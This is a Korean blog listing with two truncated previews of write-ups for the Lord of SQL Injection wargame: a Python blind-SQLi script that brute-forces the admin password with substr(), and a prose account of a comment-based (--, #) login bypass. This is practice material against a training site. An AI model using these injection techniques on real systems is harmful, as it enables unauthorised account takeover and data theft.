Los 문제풀이
-
los.rubiya.kr orcLos 문제풀이 2019. 12. 3. 10:26
import urllib3 import requests url1 = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123' or id = 'admin' and " cookie = dict(PHPSESSID="") for i in range(1,9): attack_root = "substr(pw," + str(i) + ",1) = '" for k in range(0,100): count = attack_root+chr(k) url1 = url1+count req = requests.post(url=url1,cookies=cookie) url1 = "https://los.rubiya.kr/chall/orc_60e5b360f9..
-
LOS - cobolt 문제풀이Los 문제풀이 2019. 8. 26. 18:49
코드를 보면 admin 계정탈취인데 id는 admin으로 진행을 하고 pw가 md5로 암호화되어있어서 이걸 우회해야 하는데 값을 여러가지 넣어봐도 안되서 다른방법을 찾던 중 예전에 SQLi 공부하다가 주석처리로 뒤에값을 없애버리는 방식으로 진행하기로 했다. 일단 구글링으로 mysql 주석처리 글을 보니까 표준 주석 --공백하나 : 한줄의 주석 /* 내용 */ : 여러준 주석 # 라인 이후 주석 : 비표준 출처: https://bistros.tistory.com/entry/733-MySQL-내장-함수-MySQL전용-함수 아주 잘 나와 있어서 공격을 시도해봤다. --이후 공백엔터치니 공백이 안먹혀서 %20입력 후 성공이 되었다. #으로도 공격을 시도. ...? 구글링으로 URL escape code 치고 몇..